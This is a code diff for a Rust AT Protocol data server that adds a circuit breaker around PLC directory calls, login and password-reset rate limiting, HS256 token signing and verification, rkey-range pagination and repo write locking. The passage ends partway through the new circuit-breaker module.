14
use serde::{Deserialize, Serialize};
15
use serde_json::{json, Value};
16
use std::collections::HashMap;
17
-
use tracing::{error, info};
18
19
#[derive(Debug, Deserialize)]
20
#[serde(rename_all = "camelCase")]
···
166
};
167
168
let plc_client = PlcClient::new(None);
169
-
let last_op = match plc_client.get_last_op(did).await {
170
Ok(op) => op,
171
-
Err(PlcError::NotFound) => {
172
return (
173
StatusCode::NOT_FOUND,
174
Json(json!({
···
178
)
179
.into_response();
180
}
181
-
Err(e) => {
182
error!("Failed to fetch PLC operation: {:?}", e);
183
return (
184
StatusCode::BAD_GATEWAY,
···
1
use crate::api::ApiError;
2
+
use crate::circuit_breaker::{with_circuit_breaker, CircuitBreakerError};
3
use crate::plc::{
4
+
create_update_op, sign_operation, PlcClient, PlcError, PlcOpOrTombstone, PlcService,
5
};
6
use crate::state::AppState;
7
use axum::{
···
15
use serde::{Deserialize, Serialize};
16
use serde_json::{json, Value};
17
use std::collections::HashMap;
18
+
use tracing::{error, info, warn};
19
20
#[derive(Debug, Deserialize)]
21
#[serde(rename_all = "camelCase")]
···
167
};
168
169
let plc_client = PlcClient::new(None);
170
+
let did_clone = did.clone();
171
+
let result: Result<PlcOpOrTombstone, CircuitBreakerError<PlcError>> = with_circuit_breaker(
172
+
&state.circuit_breakers.plc_directory,
173
+
|| async { plc_client.get_last_op(&did_clone).await },
174
+
)
175
+
.await;
176
+
177
+
let last_op = match result {
178
Ok(op) => op,
179
+
Err(CircuitBreakerError::CircuitOpen(e)) => {
180
+
warn!("PLC directory circuit breaker open: {}", e);
181
+
return (
182
+
StatusCode::SERVICE_UNAVAILABLE,
183
+
Json(json!({
184
+
"error": "ServiceUnavailable",
185
+
"message": "PLC directory service temporarily unavailable"
186
+
})),
187
+
)
188
+
.into_response();
189
+
}
190
+
Err(CircuitBreakerError::OperationFailed(PlcError::NotFound)) => {
191
return (
192
StatusCode::NOT_FOUND,
193
Json(json!({
···
197
)
198
.into_response();
199
}
200
+
Err(CircuitBreakerError::OperationFailed(e)) => {
201
error!("Failed to fetch PLC operation: {:?}", e);
202
return (
203
StatusCode::BAD_GATEWAY,
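For readers unfamiliar with the `with_circuit_breaker` helper used above: the `crate::circuit_breaker` module is not included in this diff, so the following is only a sketch of its apparent shape (the failure counting here is an assumption; the real module also tracks open/half-open timing per the TODO notes):

```rust
use std::future::Future;
use std::sync::atomic::{AtomicU32, Ordering};

// Hypothetical minimal breaker used only to show the helper's signature.
pub struct CircuitBreaker {
    failures: AtomicU32,
    threshold: u32,
}

pub enum CircuitBreakerError<E> {
    CircuitOpen(String),  // breaker open, operation skipped
    OperationFailed(E),   // operation ran and failed
}

pub async fn with_circuit_breaker<F, Fut, T, E>(
    breaker: &CircuitBreaker,
    op: F,
) -> Result<T, CircuitBreakerError<E>>
where
    F: FnOnce() -> Fut,
    Fut: Future<Output = Result<T, E>>,
{
    if breaker.failures.load(Ordering::Relaxed) >= breaker.threshold {
        return Err(CircuitBreakerError::CircuitOpen("circuit open".to_string()));
    }
    match op().await {
        Ok(v) => {
            breaker.failures.store(0, Ordering::Relaxed); // success resets the count
            Ok(v)
        }
        Err(e) => {
            breaker.failures.fetch_add(1, Ordering::Relaxed);
            Err(CircuitBreakerError::OperationFailed(e))
        }
    }
}
```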
+34 -11 src/api/identity/plc/submit.rs
···
1
use crate::api::ApiError;
2
-
use crate::plc::{signing_key_to_did_key, validate_plc_operation, PlcClient};
3
use crate::state::AppState;
4
use axum::{
5
extract::State,
···
183
}
184
185
let plc_client = PlcClient::new(None);
186
-
if let Err(e) = plc_client.send_operation(did, &input.operation).await {
187
-
error!("Failed to submit PLC operation: {:?}", e);
188
-
return (
189
-
StatusCode::BAD_GATEWAY,
190
-
Json(json!({
191
-
"error": "UpstreamError",
192
-
"message": format!("Failed to submit to PLC directory: {}", e)
193
-
})),
194
-
)
195
-
.into_response();
196
}
197
198
if let Err(e) = sqlx::query!(
···
1
use crate::api::ApiError;
2
+
use crate::circuit_breaker::{with_circuit_breaker, CircuitBreakerError};
3
+
use crate::plc::{signing_key_to_did_key, validate_plc_operation, PlcClient, PlcError};
4
use crate::state::AppState;
5
use axum::{
6
extract::State,
···
184
}
185
186
let plc_client = PlcClient::new(None);
187
+
let operation_clone = input.operation.clone();
188
+
let did_clone = did.clone();
189
+
let result: Result<(), CircuitBreakerError<PlcError>> = with_circuit_breaker(
190
+
&state.circuit_breakers.plc_directory,
191
+
|| async { plc_client.send_operation(&did_clone, &operation_clone).await },
192
+
)
193
+
.await;
194
+
195
+
match result {
196
+
Ok(()) => {}
197
+
Err(CircuitBreakerError::CircuitOpen(e)) => {
198
+
warn!("PLC directory circuit breaker open: {}", e);
199
+
return (
200
+
StatusCode::SERVICE_UNAVAILABLE,
201
+
Json(json!({
202
+
"error": "ServiceUnavailable",
203
+
"message": "PLC directory service temporarily unavailable"
204
+
})),
205
+
)
206
+
.into_response();
207
+
}
208
+
Err(CircuitBreakerError::OperationFailed(e)) => {
209
+
error!("Failed to submit PLC operation: {:?}", e);
210
+
return (
211
+
StatusCode::BAD_GATEWAY,
212
+
Json(json!({
213
+
"error": "UpstreamError",
214
+
"message": format!("Failed to submit to PLC directory: {}", e)
215
+
})),
216
+
)
217
+
.into_response();
218
+
}
219
}
220
221
if let Err(e) = sqlx::query!(
+1
src/api/mod.rs
+46
-46
src/api/repo/record/read.rs
···
167
168
let limit = input.limit.unwrap_or(50).clamp(1, 100);
169
let reverse = input.reverse.unwrap_or(false);
170
-
171
-
// Simplistic query construction - no sophisticated cursor handling or rkey ranges for now, just basic pagination
172
-
// TODO: Implement rkeyStart/End and correct cursor logic
173
-
174
let limit_i64 = limit as i64;
175
-
let rows_res = if let Some(cursor) = &input.cursor {
176
-
if reverse {
177
-
sqlx::query!(
178
-
"SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 AND rkey < $3 ORDER BY rkey DESC LIMIT $4",
179
-
user_id,
180
-
input.collection,
181
-
cursor,
182
-
limit_i64
183
-
)
184
-
.fetch_all(&state.db)
185
-
.await
186
-
.map(|rows| rows.into_iter().map(|r| (r.rkey, r.record_cid)).collect::<Vec<_>>())
187
-
} else {
188
-
sqlx::query!(
189
-
"SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 AND rkey > $3 ORDER BY rkey ASC LIMIT $4",
190
-
user_id,
191
-
input.collection,
192
-
cursor,
193
-
limit_i64
194
-
)
195
.fetch_all(&state.db)
196
.await
197
-
.map(|rows| rows.into_iter().map(|r| (r.rkey, r.record_cid)).collect::<Vec<_>>())
198
-
}
199
} else {
200
-
if reverse {
201
-
sqlx::query!(
202
-
"SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 ORDER BY rkey DESC LIMIT $3",
203
-
user_id,
204
-
input.collection,
205
-
limit_i64
206
-
)
207
-
.fetch_all(&state.db)
208
-
.await
209
-
.map(|rows| rows.into_iter().map(|r| (r.rkey, r.record_cid)).collect::<Vec<_>>())
210
-
} else {
211
-
sqlx::query!(
212
-
"SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 ORDER BY rkey ASC LIMIT $3",
213
-
user_id,
214
-
input.collection,
215
-
limit_i64
216
-
)
217
-
.fetch_all(&state.db)
218
-
.await
219
-
.map(|rows| rows.into_iter().map(|r| (r.rkey, r.record_cid)).collect::<Vec<_>>())
220
}
221
};
222
223
let rows = match rows_res {
···
167
168
let limit = input.limit.unwrap_or(50).clamp(1, 100);
169
let reverse = input.reverse.unwrap_or(false);
170
let limit_i64 = limit as i64;
171
+
let order = if reverse { "ASC" } else { "DESC" };
172
+
173
+
let rows_res: Result<Vec<(String, String)>, sqlx::Error> = if let Some(cursor) = &input.cursor {
174
+
let comparator = if reverse { ">" } else { "<" };
175
+
let query = format!(
176
+
"SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 AND rkey {} $3 ORDER BY rkey {} LIMIT $4",
177
+
comparator, order
178
+
);
179
+
sqlx::query_as(&query)
180
+
.bind(user_id)
181
+
.bind(&input.collection)
182
+
.bind(cursor)
183
+
.bind(limit_i64)
184
.fetch_all(&state.db)
185
.await
186
} else {
187
+
let mut conditions = vec!["repo_id = $1", "collection = $2"];
188
+
let mut param_idx = 3;
189
+
190
+
if input.rkey_start.is_some() {
191
+
conditions.push("rkey > $3");
192
+
param_idx += 1;
193
}
194
+
195
+
if input.rkey_end.is_some() {
196
+
conditions.push(if param_idx == 3 { "rkey < $3" } else { "rkey < $4" });
197
+
param_idx += 1;
198
+
}
199
+
200
+
let limit_idx = param_idx;
201
+
202
+
let query = format!(
203
+
"SELECT rkey, record_cid FROM records WHERE {} ORDER BY rkey {} LIMIT ${}",
204
+
conditions.join(" AND "),
205
+
order,
206
+
limit_idx
207
+
);
208
+
209
+
let mut query_builder = sqlx::query_as::<_, (String, String)>(&query)
210
+
.bind(user_id)
211
+
.bind(&input.collection);
212
+
213
+
if let Some(start) = &input.rkey_start {
214
+
query_builder = query_builder.bind(start);
215
+
}
216
+
if let Some(end) = &input.rkey_end {
217
+
query_builder = query_builder.bind(end);
218
+
}
219
+
220
+
query_builder.bind(limit_i64).fetch_all(&state.db).await
221
};
222
223
let rows = match rows_res {
+28
src/api/repo/record/utils.rs
···
58
let mut tx = state.db.begin().await
59
.map_err(|e| format!("Failed to begin transaction: {}", e))?;
60
61
+
let lock_result = sqlx::query!(
62
+
"SELECT repo_root_cid FROM repos WHERE user_id = $1 FOR UPDATE NOWAIT",
63
+
user_id
64
+
)
65
+
.fetch_optional(&mut *tx)
66
+
.await;
67
+
68
+
match lock_result {
69
+
Err(e) => {
70
+
if let Some(db_err) = e.as_database_error() {
71
+
if db_err.code().as_deref() == Some("55P03") {
72
+
return Err("ConcurrentModification: Another request is modifying this repo".to_string());
73
+
}
74
+
}
75
+
return Err(format!("Failed to acquire repo lock: {}", e));
76
+
}
77
+
Ok(Some(row)) => {
78
+
if let Some(expected_root) = &current_root_cid {
79
+
if row.repo_root_cid != expected_root.to_string() {
80
+
return Err("ConcurrentModification: Repo has been modified since last read".to_string());
81
+
}
82
+
}
83
+
}
84
+
Ok(None) => {
85
+
return Err("Repo not found".to_string());
86
+
}
87
+
}
88
+
89
sqlx::query!("UPDATE repos SET repo_root_cid = $1 WHERE user_id = $2", new_root_cid.to_string(), user_id)
90
.execute(&mut *tx)
91
.await
+8
src/api/server/meta.rs
···
4
5
use tracing::error;
6
7
+
pub async fn robots_txt() -> impl IntoResponse {
8
+
(
9
+
StatusCode::OK,
10
+
[("content-type", "text/plain")],
11
+
"# Hello!\n\n# Crawling the public API is allowed\nUser-agent: *\nAllow: /\n",
12
+
)
13
+
}
14
+
15
pub async fn describe_server() -> impl IntoResponse {
16
let domains_str =
17
std::env::var("AVAILABLE_USER_DOMAINS").unwrap_or_else(|_| "example.com".to_string());
+1
-1
src/api/server/mod.rs
···
15
pub use app_password::{create_app_password, list_app_passwords, revoke_app_password};
16
pub use email::{confirm_email, request_email_update, update_email};
17
pub use invite::{create_invite_code, create_invite_codes, get_account_invite_codes};
18
-
pub use meta::{describe_server, health};
19
pub use password::{request_password_reset, reset_password};
20
pub use service_auth::get_service_auth;
21
pub use session::{create_session, delete_session, get_session, refresh_session};
···
15
pub use app_password::{create_app_password, list_app_passwords, revoke_app_password};
16
pub use email::{confirm_email, request_email_update, update_email};
17
pub use invite::{create_invite_code, create_invite_codes, get_account_invite_codes};
18
+
pub use meta::{describe_server, health, robots_txt};
19
pub use password::{request_password_reset, reset_password};
20
pub use service_auth::get_service_auth;
21
pub use session::{create_session, delete_session, get_session, refresh_session};
+31
-1
src/api/server/password.rs
···
2
use axum::{
3
Json,
4
extract::State,
5
-
http::StatusCode,
6
response::{IntoResponse, Response},
7
};
8
use bcrypt::{hash, DEFAULT_COST};
···
15
crate::util::generate_token_code()
16
}
17
18
#[derive(Deserialize)]
19
pub struct RequestPasswordResetInput {
20
pub email: String,
···
22
23
pub async fn request_password_reset(
24
State(state): State<AppState>,
25
Json(input): Json<RequestPasswordResetInput>,
26
) -> Response {
27
let email = input.email.trim().to_lowercase();
28
if email.is_empty() {
29
return (
···
2
use axum::{
3
Json,
4
extract::State,
5
+
http::{HeaderMap, StatusCode},
6
response::{IntoResponse, Response},
7
};
8
use bcrypt::{hash, DEFAULT_COST};
···
15
crate::util::generate_token_code()
16
}
17
18
+
fn extract_client_ip(headers: &HeaderMap) -> String {
19
+
if let Some(forwarded) = headers.get("x-forwarded-for") {
20
+
if let Ok(value) = forwarded.to_str() {
21
+
if let Some(first_ip) = value.split(',').next() {
22
+
return first_ip.trim().to_string();
23
+
}
24
+
}
25
+
}
26
+
if let Some(real_ip) = headers.get("x-real-ip") {
27
+
if let Ok(value) = real_ip.to_str() {
28
+
return value.trim().to_string();
29
+
}
30
+
}
31
+
"unknown".to_string()
32
+
}
33
+
34
#[derive(Deserialize)]
35
pub struct RequestPasswordResetInput {
36
pub email: String,
···
38
39
pub async fn request_password_reset(
40
State(state): State<AppState>,
41
+
headers: HeaderMap,
42
Json(input): Json<RequestPasswordResetInput>,
43
) -> Response {
44
+
let client_ip = extract_client_ip(&headers);
45
+
if state.rate_limiters.password_reset.check_key(&client_ip).is_err() {
46
+
warn!(ip = %client_ip, "Password reset rate limit exceeded");
47
+
return (
48
+
StatusCode::TOO_MANY_REQUESTS,
49
+
Json(json!({
50
+
"error": "RateLimitExceeded",
51
+
"message": "Too many password reset requests. Please try again later."
52
+
})),
53
+
)
54
+
.into_response();
55
+
}
56
+
57
let email = input.email.trim().to_lowercase();
58
if email.is_empty() {
59
return (
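Both request_password_reset above and create_session below gate on state.rate_limiters.*.check_key(&client_ip). A minimal sketch of the kind of keyed limiter that implies, assuming the governor crate; the quota and the crate choice are assumptions, since the rate_limit module itself is not part of this excerpt.

use std::num::NonZeroU32;

use governor::{Quota, RateLimiter};

// Sketch of a keyed, per-client-IP limiter of the kind check_key() implies.
// The governor crate and the 10-per-minute quota are assumptions; the real
// rate_limit module is not shown in this excerpt.
fn login_allowed(client_ip: &str) -> bool {
    // In the server a limiter like this lives in AppState (state.rate_limiters)
    // so its counters persist across requests; it is built inline here only to
    // keep the sketch self-contained.
    let limiter = RateLimiter::keyed(Quota::per_minute(NonZeroU32::new(10).unwrap()));
    limiter.check_key(&client_ip.to_string()).is_ok()
}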
+31
src/api/server/session.rs
···
4
use axum::{
5
Json,
6
extract::State,
7
response::{IntoResponse, Response},
8
};
9
use bcrypt::verify;
···
11
use serde_json::json;
12
use tracing::{error, info, warn};
13
14
#[derive(Deserialize)]
15
pub struct CreateSessionInput {
16
pub identifier: String,
···
28
29
pub async fn create_session(
30
State(state): State<AppState>,
31
Json(input): Json<CreateSessionInput>,
32
) -> Response {
33
info!("create_session called");
34
35
let row = match sqlx::query!(
36
"SELECT u.id, u.did, u.handle, u.password_hash, k.key_bytes, k.encryption_version FROM users u JOIN user_keys k ON u.id = k.user_id WHERE u.handle = $1 OR u.email = $1",
···
4
use axum::{
5
Json,
6
extract::State,
7
+
http::{HeaderMap, StatusCode},
8
response::{IntoResponse, Response},
9
};
10
use bcrypt::verify;
···
12
use serde_json::json;
13
use tracing::{error, info, warn};
14
15
+
fn extract_client_ip(headers: &HeaderMap) -> String {
16
+
if let Some(forwarded) = headers.get("x-forwarded-for") {
17
+
if let Ok(value) = forwarded.to_str() {
18
+
if let Some(first_ip) = value.split(',').next() {
19
+
return first_ip.trim().to_string();
20
+
}
21
+
}
22
+
}
23
+
if let Some(real_ip) = headers.get("x-real-ip") {
24
+
if let Ok(value) = real_ip.to_str() {
25
+
return value.trim().to_string();
26
+
}
27
+
}
28
+
"unknown".to_string()
29
+
}
30
+
31
#[derive(Deserialize)]
32
pub struct CreateSessionInput {
33
pub identifier: String,
···
45
46
pub async fn create_session(
47
State(state): State<AppState>,
48
+
headers: HeaderMap,
49
Json(input): Json<CreateSessionInput>,
50
) -> Response {
51
info!("create_session called");
52
+
53
+
let client_ip = extract_client_ip(&headers);
54
+
if state.rate_limiters.login.check_key(&client_ip).is_err() {
55
+
warn!(ip = %client_ip, "Login rate limit exceeded");
56
+
return (
57
+
StatusCode::TOO_MANY_REQUESTS,
58
+
Json(json!({
59
+
"error": "RateLimitExceeded",
60
+
"message": "Too many login attempts. Please try again later."
61
+
})),
62
+
)
63
+
.into_response();
64
+
}
65
66
let row = match sqlx::query!(
67
"SELECT u.id, u.did, u.handle, u.password_hash, k.key_bytes, k.encryption_version FROM users u JOIN user_keys k ON u.id = k.user_id WHERE u.handle = $1 OR u.email = $1",
+48
src/api/temp.rs
···
···
1
+
use axum::{
2
+
Json,
3
+
extract::State,
4
+
http::{HeaderMap, StatusCode},
5
+
response::{IntoResponse, Response},
6
+
};
7
+
use serde::Serialize;
8
+
use serde_json::json;
9
+
10
+
use crate::auth::{extract_bearer_token_from_header, validate_bearer_token};
11
+
use crate::state::AppState;
12
+
13
+
#[derive(Serialize)]
14
+
#[serde(rename_all = "camelCase")]
15
+
pub struct CheckSignupQueueOutput {
16
+
pub activated: bool,
17
+
#[serde(skip_serializing_if = "Option::is_none")]
18
+
pub place_in_queue: Option<i64>,
19
+
#[serde(skip_serializing_if = "Option::is_none")]
20
+
pub estimated_time_ms: Option<i64>,
21
+
}
22
+
23
+
pub async fn check_signup_queue(
24
+
State(state): State<AppState>,
25
+
headers: HeaderMap,
26
+
) -> Response {
27
+
if let Some(token) = extract_bearer_token_from_header(
28
+
headers.get("Authorization").and_then(|h| h.to_str().ok())
29
+
) {
30
+
if let Ok(user) = validate_bearer_token(&state.db, &token).await {
31
+
if user.is_oauth {
32
+
return (
33
+
StatusCode::FORBIDDEN,
34
+
Json(json!({
35
+
"error": "Forbidden",
36
+
"message": "OAuth credentials are not supported for this endpoint"
37
+
})),
38
+
).into_response();
39
+
}
40
+
}
41
+
}
42
+
43
+
Json(CheckSignupQueueOutput {
44
+
activated: true,
45
+
place_in_queue: None,
46
+
estimated_time_ms: None,
47
+
}).into_response()
48
+
}
+98
src/auth/token.rs
···
3
use base64::Engine as _;
4
use base64::engine::general_purpose::URL_SAFE_NO_PAD;
5
use chrono::{DateTime, Duration, Utc};
6
use k256::ecdsa::{Signature, SigningKey, signature::Signer};
7
use uuid;
8
9
pub const TOKEN_TYPE_ACCESS: &str = "at+jwt";
10
pub const TOKEN_TYPE_REFRESH: &str = "refresh+jwt";
···
118
119
Ok(format!("{}.{}", message, signature_b64))
120
}
···
3
use base64::Engine as _;
4
use base64::engine::general_purpose::URL_SAFE_NO_PAD;
5
use chrono::{DateTime, Duration, Utc};
6
+
use hmac::{Hmac, Mac};
7
use k256::ecdsa::{Signature, SigningKey, signature::Signer};
8
+
use sha2::Sha256;
9
use uuid;
10
+
11
+
type HmacSha256 = Hmac<Sha256>;
12
13
pub const TOKEN_TYPE_ACCESS: &str = "at+jwt";
14
pub const TOKEN_TYPE_REFRESH: &str = "refresh+jwt";
···
122
123
Ok(format!("{}.{}", message, signature_b64))
124
}
125
+
126
+
pub fn create_access_token_hs256(did: &str, secret: &[u8]) -> Result<String> {
127
+
Ok(create_access_token_hs256_with_metadata(did, secret)?.token)
128
+
}
129
+
130
+
pub fn create_refresh_token_hs256(did: &str, secret: &[u8]) -> Result<String> {
131
+
Ok(create_refresh_token_hs256_with_metadata(did, secret)?.token)
132
+
}
133
+
134
+
pub fn create_access_token_hs256_with_metadata(did: &str, secret: &[u8]) -> Result<TokenWithMetadata> {
135
+
create_hs256_token_with_metadata(did, SCOPE_ACCESS, TOKEN_TYPE_ACCESS, secret, Duration::minutes(120))
136
+
}
137
+
138
+
pub fn create_refresh_token_hs256_with_metadata(did: &str, secret: &[u8]) -> Result<TokenWithMetadata> {
139
+
create_hs256_token_with_metadata(did, SCOPE_REFRESH, TOKEN_TYPE_REFRESH, secret, Duration::days(90))
140
+
}
141
+
142
+
pub fn create_service_token_hs256(did: &str, aud: &str, lxm: &str, secret: &[u8]) -> Result<String> {
143
+
let expiration = Utc::now()
144
+
.checked_add_signed(Duration::seconds(60))
145
+
.expect("valid timestamp")
146
+
.timestamp();
147
+
148
+
let claims = Claims {
149
+
iss: did.to_owned(),
150
+
sub: did.to_owned(),
151
+
aud: aud.to_owned(),
152
+
exp: expiration as usize,
153
+
iat: Utc::now().timestamp() as usize,
154
+
scope: None,
155
+
lxm: Some(lxm.to_string()),
156
+
jti: uuid::Uuid::new_v4().to_string(),
157
+
};
158
+
159
+
sign_claims_hs256(claims, TOKEN_TYPE_SERVICE, secret)
160
+
}
161
+
162
+
fn create_hs256_token_with_metadata(
163
+
did: &str,
164
+
scope: &str,
165
+
typ: &str,
166
+
secret: &[u8],
167
+
duration: Duration,
168
+
) -> Result<TokenWithMetadata> {
169
+
let expires_at = Utc::now()
170
+
.checked_add_signed(duration)
171
+
.expect("valid timestamp");
172
+
let expiration = expires_at.timestamp();
173
+
let jti = uuid::Uuid::new_v4().to_string();
174
+
175
+
let claims = Claims {
176
+
iss: did.to_owned(),
177
+
sub: did.to_owned(),
178
+
aud: format!(
179
+
"did:web:{}",
180
+
std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string())
181
+
),
182
+
exp: expiration as usize,
183
+
iat: Utc::now().timestamp() as usize,
184
+
scope: Some(scope.to_string()),
185
+
lxm: None,
186
+
jti: jti.clone(),
187
+
};
188
+
189
+
let token = sign_claims_hs256(claims, typ, secret)?;
190
+
Ok(TokenWithMetadata {
191
+
token,
192
+
jti,
193
+
expires_at,
194
+
})
195
+
}
196
+
197
+
fn sign_claims_hs256(claims: Claims, typ: &str, secret: &[u8]) -> Result<String> {
198
+
let header = Header {
199
+
alg: "HS256".to_string(),
200
+
typ: typ.to_string(),
201
+
};
202
+
203
+
let header_json = serde_json::to_string(&header)?;
204
+
let claims_json = serde_json::to_string(&claims)?;
205
+
206
+
let header_b64 = URL_SAFE_NO_PAD.encode(header_json);
207
+
let claims_b64 = URL_SAFE_NO_PAD.encode(claims_json);
208
+
209
+
let message = format!("{}.{}", header_b64, claims_b64);
210
+
211
+
let mut mac = HmacSha256::new_from_slice(secret)
212
+
.map_err(|e| anyhow::anyhow!("Invalid secret length: {}", e))?;
213
+
mac.update(message.as_bytes());
214
+
let signature = mac.finalize().into_bytes();
215
+
let signature_b64 = URL_SAFE_NO_PAD.encode(signature);
216
+
217
+
Ok(format!("{}.{}", message, signature_b64))
218
+
}
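The HS256 helpers above mirror the existing ES256K signing path but with a shared-secret MAC. A minimal sketch of minting a token pair with them; reading the secret from a JWT_SECRET environment variable and the crate::auth re-export path are assumptions, not taken from this diff.

use crate::auth::{
    create_access_token_hs256_with_metadata, create_refresh_token_hs256_with_metadata,
};

// Sketch: mint an HS256 access/refresh pair and keep the metadata around,
// e.g. for a session table. Sourcing the secret from JWT_SECRET is an
// assumption; this diff does not show where the shared secret comes from.
fn issue_hs256_pair(did: &str) -> anyhow::Result<(String, String)> {
    let secret = std::env::var("JWT_SECRET")?.into_bytes();
    let access = create_access_token_hs256_with_metadata(did, &secret)?;
    let refresh = create_refresh_token_hs256_with_metadata(did, &secret)?;
    // access.jti and access.expires_at (and likewise for refresh) are the
    // pieces a revocation table would persist.
    Ok((access.token, refresh.token))
}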
+106
src/auth/verify.rs
···
4
use base64::Engine as _;
5
use base64::engine::general_purpose::URL_SAFE_NO_PAD;
6
use chrono::Utc;
7
use k256::ecdsa::{Signature, SigningKey, VerifyingKey, signature::Verifier};
8
9
pub fn get_did_from_token(token: &str) -> Result<String, String> {
10
let parts: Vec<&str> = token.split('.').collect();
···
63
)
64
}
65
66
fn verify_token_internal(
67
token: &str,
68
key_bytes: &[u8],
···
124
125
Ok(TokenData { claims })
126
}
···
4
use base64::Engine as _;
5
use base64::engine::general_purpose::URL_SAFE_NO_PAD;
6
use chrono::Utc;
7
+
use hmac::{Hmac, Mac};
8
use k256::ecdsa::{Signature, SigningKey, VerifyingKey, signature::Verifier};
9
+
use sha2::Sha256;
10
+
use subtle::ConstantTimeEq;
11
+
12
+
type HmacSha256 = Hmac<Sha256>;
13
14
pub fn get_did_from_token(token: &str) -> Result<String, String> {
15
let parts: Vec<&str> = token.split('.').collect();
···
68
)
69
}
70
71
+
pub fn verify_access_token_hs256(token: &str, secret: &[u8]) -> Result<TokenData<Claims>> {
72
+
verify_token_hs256_internal(
73
+
token,
74
+
secret,
75
+
Some(TOKEN_TYPE_ACCESS),
76
+
Some(&[SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED]),
77
+
)
78
+
}
79
+
80
+
pub fn verify_refresh_token_hs256(token: &str, secret: &[u8]) -> Result<TokenData<Claims>> {
81
+
verify_token_hs256_internal(
82
+
token,
83
+
secret,
84
+
Some(TOKEN_TYPE_REFRESH),
85
+
Some(&[SCOPE_REFRESH]),
86
+
)
87
+
}
88
+
89
fn verify_token_internal(
90
token: &str,
91
key_bytes: &[u8],
···
147
148
Ok(TokenData { claims })
149
}
150
+
151
+
fn verify_token_hs256_internal(
152
+
token: &str,
153
+
secret: &[u8],
154
+
expected_typ: Option<&str>,
155
+
allowed_scopes: Option<&[&str]>,
156
+
) -> Result<TokenData<Claims>> {
157
+
let parts: Vec<&str> = token.split('.').collect();
158
+
if parts.len() != 3 {
159
+
return Err(anyhow!("Invalid token format"));
160
+
}
161
+
162
+
let header_b64 = parts[0];
163
+
let claims_b64 = parts[1];
164
+
let signature_b64 = parts[2];
165
+
166
+
let header_bytes = URL_SAFE_NO_PAD
167
+
.decode(header_b64)
168
+
.context("Base64 decode of header failed")?;
169
+
let header: Header =
170
+
serde_json::from_slice(&header_bytes).context("JSON decode of header failed")?;
171
+
172
+
if header.alg != "HS256" {
173
+
return Err(anyhow!("Expected HS256 algorithm, got {}", header.alg));
174
+
}
175
+
176
+
if let Some(expected) = expected_typ {
177
+
if header.typ != expected {
178
+
return Err(anyhow!("Invalid token type: expected {}, got {}", expected, header.typ));
179
+
}
180
+
}
181
+
182
+
let signature_bytes = URL_SAFE_NO_PAD
183
+
.decode(signature_b64)
184
+
.context("Base64 decode of signature failed")?;
185
+
186
+
let message = format!("{}.{}", header_b64, claims_b64);
187
+
let mut mac = HmacSha256::new_from_slice(secret)
188
+
.map_err(|e| anyhow!("Invalid secret: {}", e))?;
189
+
mac.update(message.as_bytes());
190
+
let expected_signature = mac.finalize().into_bytes();
191
+
192
+
let is_valid: bool = signature_bytes.ct_eq(&expected_signature).into();
193
+
if !is_valid {
194
+
return Err(anyhow!("Signature verification failed"));
195
+
}
196
+
197
+
let claims_bytes = URL_SAFE_NO_PAD
198
+
.decode(claims_b64)
199
+
.context("Base64 decode of claims failed")?;
200
+
let claims: Claims =
201
+
serde_json::from_slice(&claims_bytes).context("JSON decode of claims failed")?;
202
+
203
+
let now = Utc::now().timestamp() as usize;
204
+
if claims.exp < now {
205
+
return Err(anyhow!("Token expired"));
206
+
}
207
+
208
+
if let Some(scopes) = allowed_scopes {
209
+
let token_scope = claims.scope.as_deref().unwrap_or("");
210
+
if !scopes.contains(&token_scope) {
211
+
return Err(anyhow!("Invalid token scope: {}", token_scope));
212
+
}
213
+
}
214
+
215
+
Ok(TokenData { claims })
216
+
}
217
+
218
+
pub fn get_algorithm_from_token(token: &str) -> Result<String, String> {
219
+
let parts: Vec<&str> = token.split('.').collect();
220
+
if parts.len() != 3 {
221
+
return Err("Invalid token format".to_string());
222
+
}
223
+
224
+
let header_bytes = URL_SAFE_NO_PAD
225
+
.decode(parts[0])
226
+
.map_err(|e| format!("Base64 decode failed: {}", e))?;
227
+
228
+
let header: Header =
229
+
serde_json::from_slice(&header_bytes).map_err(|e| format!("JSON decode failed: {}", e))?;
230
+
231
+
Ok(header.alg)
232
+
}
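With both signature schemes in play, a caller can branch on get_algorithm_from_token before choosing a verifier. A minimal sketch, assuming crate::auth re-exports these helpers; the ES256K branch is left as a comment because that verifier predates this diff.

use crate::auth::{get_algorithm_from_token, verify_access_token_hs256};

// Sketch: dispatch verification on the token's header algorithm. Only the
// HS256 path is defined in this diff; the ES256K branch stands in for the
// existing per-user-key verifier.
fn verify_any_access_token(token: &str, hs256_secret: &[u8]) -> anyhow::Result<()> {
    match get_algorithm_from_token(token)
        .map_err(|e| anyhow::anyhow!(e))?
        .as_str()
    {
        "HS256" => {
            verify_access_token_hs256(token, hs256_secret)?;
        }
        "ES256K" => {
            // look up the user's signing key and call the existing verifier
        }
        other => anyhow::bail!("unsupported token algorithm: {}", other),
    }
    Ok(())
}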
+307
src/circuit_breaker.rs
···
···
1
+
use std::sync::atomic::{AtomicU32, AtomicU64, Ordering};
2
+
use std::sync::Arc;
3
+
use std::time::Duration;
4
+
use tokio::sync::RwLock;
5
+
6
+
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
7
+
pub enum CircuitState {
8
+
Closed,
9
+
Open,
10
+
HalfOpen,
11
+
}
12
+
13
+
pub struct CircuitBreaker {
14
+
name: String,
15
+
failure_threshold: u32,
16
+
success_threshold: u32,
17
+
timeout: Duration,
18
+
state: Arc<RwLock<CircuitState>>,
19
+
failure_count: AtomicU32,
20
+
success_count: AtomicU32,
21
+
last_failure_time: AtomicU64,
22
+
}
23
+
24
+
impl CircuitBreaker {
25
+
pub fn new(name: &str, failure_threshold: u32, success_threshold: u32, timeout_secs: u64) -> Self {
26
+
Self {
27
+
name: name.to_string(),
28
+
failure_threshold,
29
+
success_threshold,
30
+
timeout: Duration::from_secs(timeout_secs),
31
+
state: Arc::new(RwLock::new(CircuitState::Closed)),
32
+
failure_count: AtomicU32::new(0),
33
+
success_count: AtomicU32::new(0),
34
+
last_failure_time: AtomicU64::new(0),
35
+
}
36
+
}
37
+
38
+
pub async fn can_execute(&self) -> bool {
39
+
let state = self.state.read().await;
40
+
match *state {
41
+
CircuitState::Closed => true,
42
+
